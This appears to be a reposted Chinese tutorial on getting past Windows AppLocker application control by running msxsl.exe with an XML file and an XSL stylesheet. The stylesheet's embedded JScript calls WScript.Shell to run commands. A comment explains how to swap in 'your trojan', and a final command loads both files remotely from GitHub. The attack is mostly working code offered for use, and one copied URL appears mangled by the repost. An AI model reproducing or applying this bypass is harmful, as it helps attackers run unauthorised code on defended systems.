【利用MSXSL.exe绕过AppLocker应用程序控制策略】厌伴老儒烹瓠叶,强随举子踏槐花。这篇文章主要讲述利用MSXSL.exe绕过AppLocker应用程序控制策略相关的知识,希望能为你提供帮助。
1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行javascript进而执行系统命令,其下载地址为:
https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714
2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:
msxsl.exe test.xml exec.xsl
test.xml:
< ?xml version="1.0"?> < ?xml-stylesheet type="text/xsl" href="https://www.songbingjia.com/android/exec.xsl" ?> < customers> < customer> < name> Microsoft< /name> < /customer> < /customers>
exec.xsl
< ?xml version=\'1.0\'?> < xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="http://mycompany.com/mynamespace"> < msxsl:script language="JScript" implements-prefix="user"> function xml(nodelist) {var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); //这里可以改造为执行你的木马文件如:// var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\\ & shell.exe"); return nodelist.nextNode().xml; }< /msxsl:script> < xsl:template match="/"> < xsl:value-of select="user:xml(.)"/> < /xsl:template> < /xsl:stylesheet>
3.最终执行结果为:
文章图片
4.也可以远程执行:
msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/backlion/demo/master/exec.xsl
文章图片
推荐阅读
- Android如何设置TextView的行间距行高
- android 通过监听edittext实现button的点击事件
- Android bluetooth介绍( 蓝牙扫描(scan)设备分析)
- android mediaplayer VideoPlayerManager 加载视频闪屏问题排查解决
- Android知识体系梳理笔记三(动态代理模式---插件加载机制学习笔记)
- Android 多线程编程初探
- Android 你不可不看的命名规范
- 用树莓派改装电风扇及实现Android遥控
- 集成Android免费语音合成功能(在线离线离在线融合)